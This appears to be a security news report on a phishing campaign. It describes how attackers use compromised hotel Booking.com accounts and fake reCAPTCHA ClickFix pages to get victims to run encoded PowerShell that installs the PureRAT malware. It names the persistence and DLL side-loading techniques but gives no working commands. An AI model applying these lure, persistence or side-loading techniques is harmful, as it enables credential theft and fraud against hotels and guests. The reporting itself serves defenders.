A sophisticated phishing campaign is actively targeting hotel establishments and their guests through compromised Booking.com accounts, according to research uncovered by security experts.
The campaign, dubbed “I Paid Twice” due to evidence of victims paying twice for their reservations, has been operating since at least April 2025 and remains active as of October 2025.
The attack scheme combines credential theft with multi-stage malware deployment, creating a complex threat targeting the global hospitality sector.
The operation begins when threat actors compromise hotel administrator systems through spearphishing emails that impersonate legitimate Booking.com communications.
.webp "New Phising Attack Targeting Travellers from Hotel’s Compromised Booking.com Account 2")
These emails contain carefully crafted messages referencing guest reservations and booking platform activities, lending them credibility to unsuspecting recipients.
The emails include malicious URLs that redirect victims through a sophisticated redirection infrastructure before deploying the ClickFix social engineering tactic.
Once victims execute the downloaded commands, malware infects their systems, granting attackers access to professional credentials for booking platforms like Booking.com and Expedia.
The broader criminal ecosystem supporting this operation reveals an alarming level of professionalization within cybercrime communities.
Threat actors harvest hotel administrator credentials and sell them through Russian-speaking cybercrime forums and marketplaces.
High-value compromised Booking.com accounts managing multiple properties in developed nations command prices between $5 and $5,000 depending on activity levels and reservation volumes.
This commodification of stolen credentials has created a self-sustaining fraud pipeline where specialized services handle each phase of the attack chain.
Sekoia security researchers identified the malware family PureRAT at the core of this infection chain.
Once deployed through the ClickFix redirection mechanism, PureRAT executes PowerShell commands that gather system information and download additional payload files.
The malware establishes persistence through Windows registry modifications and implements a sophisticated loader mechanism using DLL side-loading techniques.
Technical Breakdown of the Infection Mechanism
The attack initiates when victims receive phishing emails from compromised hotel accounts. Malicious URLs redirect through randomized domains following the pattern hxxps://{randomname}[.]com/[a-z0-9]{4}.
These domains employ sophisticated JavaScript that checks iframe contexts before redirecting users to ClickFix pages.
.webp "New Phising Attack Targeting Travellers from Hotel’s Compromised Booking.com Account 4")
The redirection infrastructure serves as a commercialized Traffic Distribution System (TDS), concealing the attacker’s primary infrastructure from detection and takedown efforts.
Each redirection step carefully preserves URL patterns containing keywords like “admin” and “extranet” to maintain perceived legitimacy during the social engineering phase.
When users land on ClickFix pages, they encounter Booking.com brand elements alongside a reCAPTCHA interface prompting them to copy commands.
The copied command contains Base64-encoded PowerShell instructions that execute without user awareness.
This initial PowerShell command downloads secondary scripts from staging URLs ending in /bomla, which orchestrates the infection progression.
The loader gathers comprehensive system information including machine name, current user, Windows version, and installed antivirus products before downloading a ZIP archive containing executable and dynamic link library files.
Persistence mechanisms employ multiple techniques to ensure malware survives system restarts. The installation process creates Run registry keys under CurrentVersionRun that execute PowerShell commands loading the extracted binary.
Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.
The malware reports status updates at each infection stage through Command and Control servers, confirming successful progression.
The .exe binary triggers DLL side-loading using AddInProcess32.exe, a legitimate Windows component designed to host COM add-ins.
This technique allows PureRAT to execute entirely in memory without writing files to disk, significantly complicating detection efforts and enabling fileless malware execution that bypasses traditional signature-based security tools.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
